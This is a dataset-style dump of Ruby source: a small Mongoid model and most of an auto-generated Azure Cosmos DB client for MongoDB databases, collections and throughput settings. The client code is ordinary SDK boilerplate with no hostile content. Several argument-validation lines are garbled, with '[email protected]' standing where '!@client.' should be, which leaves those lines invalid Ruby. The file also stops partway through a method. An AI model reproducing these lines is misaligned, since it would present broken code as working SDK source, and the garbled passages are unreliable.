hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
4a20b017e64545ae18b6ca68eadd0421b81398d3 | 78 | # frozen_string_literal: true
class SubItem < Item
embedded_in :parent
end
| 13 | 29 | 0.782051 |
9139f2d6500c06312d631bffa2fcf53203d456cb | 98,226 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Cosmosdb::Mgmt::V2020_06_01_preview
#
# MongoDBResources
#
class MongoDBResources
include MsRestAzure
#
# Creates and initializes a new instance of the MongoDBResources class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [CosmosDBManagementClient] reference to the CosmosDBManagementClient
attr_reader :client
#
# Lists the MongoDB databases under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseListResult] operation results.
#
def list_mongo_dbdatabases(resource_group_name, account_name, custom_headers:nil)
response = list_mongo_dbdatabases_async(resource_group_name, account_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists the MongoDB databases under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_mongo_dbdatabases_with_http_info(resource_group_name, account_name, custom_headers:nil)
list_mongo_dbdatabases_async(resource_group_name, account_name, custom_headers:custom_headers).value!
end
#
# Lists the MongoDB databases under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_mongo_dbdatabases_async(resource_group_name, account_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the MongoDB databases under an existing Azure Cosmos DB database account
# with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseGetResults] operation results.
#
def get_mongo_dbdatabase(resource_group_name, account_name, database_name, custom_headers:nil)
response = get_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the MongoDB databases under an existing Azure Cosmos DB database account
# with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbdatabase_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
get_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
end
#
# Gets the MongoDB databases under an existing Azure Cosmos DB database account
# with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseGetResults] operation results.
#
def create_update_mongo_dbdatabase(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
response = create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
# Send request
promise = begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseGetResults.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def delete_mongo_dbdatabase(resource_group_name, account_name, database_name, custom_headers:nil)
response = delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
nil
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:nil)
# Send request
promise = begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Gets the RUs per second of the MongoDB database under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def get_mongo_dbdatabase_throughput(resource_group_name, account_name, database_name, custom_headers:nil)
response = get_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the RUs per second of the MongoDB database under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbdatabase_throughput_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
get_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
end
#
# Gets the RUs per second of the MongoDB database under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Update RUs per second of the an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def update_mongo_dbdatabase_throughput(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
response = update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
# Send request
promise = begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Lists the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionListResult] operation results.
#
def list_mongo_dbcollections(resource_group_name, account_name, database_name, custom_headers:nil)
response = list_mongo_dbcollections_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_mongo_dbcollections_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
list_mongo_dbcollections_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
end
#
# Lists the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_mongo_dbcollections_async(resource_group_name, account_name, database_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionGetResults] operation results.
#
def get_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
response = get_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbcollection_with_http_info(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
get_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
end
#
# Gets the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionGetResults] operation results.
#
def create_update_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
response = create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
